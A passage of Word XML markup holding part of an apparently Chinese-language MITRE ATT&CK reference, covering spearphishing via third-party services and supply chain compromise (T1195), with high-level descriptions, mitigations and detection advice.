              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t xml:space="preserve"> Windows, macOS, Linux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E17BAB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SSL/TLS</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测，杀毒软件，</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>代理</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5552097D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:hyperlink r:id="rId24" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00193DF3">
                <w:t>CAPEC-163</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4742ED5B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1256A33F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C1628F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00825EA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过服务进行鱼叉钓鱼攻击是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络钓鱼的一个特定方式。区别于其他鱼叉钓鱼攻击，它不使用企业邮件系统，而是使用第三方服务来实现攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EEC40B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有的鱼叉钓鱼攻击都是针对一个具体的个人、公司或者行业的数字化社会工程学攻击手法。在这种情况下，攻击者通过社交媒体，私人邮箱或者其他的不受企业管控的服务来发送信息。与企业相比，这些服务往往都没有严格的安全策略和保护。和大多数的鱼叉钓鱼攻击一样，这种攻击手法的目标也是和目标建立某种关系或者以某种方式引起目标的兴趣。攻击者会创建虚假的社交账号并给员工发送诸如工作机会的消息，通过这样的方式来创造合理的理由询问企业环境中运行的软件，服务与安全策略等信息。攻击者还可以通过这些第三方服务发送恶意链接或者附件给用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E3A766" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>一个常见的例子是通过社交媒体与攻击目标建立良好的关系，然后将某些攻击负载发送给私人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮箱，然后使目标用户在他的工作计算机上打开。这样可以让攻击者绕开攻击目标的邮件安全保护限制，并且目标用户也更愿意打开这些攻击负载文件，因为这已经是他们期望收到的邮件。哪怕攻击负载没有有效的执行或工作，攻击者还可以持续的和攻击目标用户沟通来定位问题所在直到最终成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F99BFE1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="9740" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7193"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005C4554" w14:paraId="340C731A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7863140B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0C04ED33" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="1EDFFE4D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CA8816A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>杀毒程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47799899" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>杀毒程序可以自动隔离可疑文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="54A4E5AB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="122B85D9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内容访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ABAA050" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确定某些社交媒体网站，私人</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>邮箱或者其他的可能被用于鱼叉式钓鱼攻击的服务是否是工作必须。如果这些服务上的活动无法有效监控或者存在重大风险，请考虑阻止相关的服务访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="3C1F777A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="550BAB55" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户培训</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BB8D065" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>培训用户如何识别社会工程学技巧和如何识别带恶意链接的钓鱼邮件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E37536C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B881061" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为大多数被用于鱼叉式钓鱼攻击的服务都启用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密，因此需要检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:t>/TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的初始通信连接。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:t>/T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入侵检测签名或者其他的安全网关设备可以用来检测恶意软件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE93148" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当文件被下载并保存到用户的计算机上时，杀毒软件可以用来检测恶意文件。终端探针或者网络探针也可以用来检测文件被打开后的恶意行为（比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件被打开后创建了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程或者连接了互联网），相关的攻击技术有“客户端执行利用”和“脚本编程”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36145B0B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00085A28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>供应链威胁</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="5ABEA52E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45F57E33" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t>: T1195</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75F7561F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CAFDD2C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t xml:space="preserve"> Linux, Windows, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71C4A8D7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>代理，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="208E215D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t xml:space="preserve">:  </w:t>
            </w:r>
            <w:hyperlink r:id="rId25" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00193DF3">
                <w:t>CAPEC-437,</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00193DF3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId26" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00193DF3">
                <w:t>CAPEC-438,</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00193DF3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId27" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00193DF3">
                <w:t>CAPEC-439</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="07A2BDF0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00193DF3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t>: Veeral Patel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="095D48CD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00193DF3">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00193DF3">
              <w:t xml:space="preserve"> 1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5ED3C534" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D414084" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>供应链威胁是在用户得到交付物之前，通过篡改产品或者产品交付机制从而威胁到数据或者系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5505FB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>供应链威胁可以在供应链的任何阶段发生，比如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D35C1B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>篡改开发工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22813D32" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>篡改开发环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53156248" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>篡改代码仓库（公开或私有的）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76684A0E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>篡改依赖的开源代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EDFC7D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>篡改软件的更新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分发机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FC158F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感染系统镜像（已经有多起可移动介质在工厂中即被感染的案例）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3FA19" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用修改过的版本替换合法软件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2E612D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向合法的软件分销商销售篡改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假冒的产品</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77530237" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装运过程中拦截</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4688F662" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C93689" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然供应链威胁可以影响到硬件或者软件的任意组成部分，但是希望获得执行权限的攻击者通常专注于在软件分发或者更新渠道给合法软件添加恶意负载。目标可能是一个特定的受害者集体，或者恶意软件可能广泛的传播给了大众但是只针对特定受害者采取进一步的动作。被广泛采用的开源软件项目也可能被攻击者利用，成为向受害目标添加恶意代码的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F60F7EE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1696"/>
        <w:gridCol w:w="8040"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005C4554" w14:paraId="3B99F56B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="16140F46" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1A9AB18C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
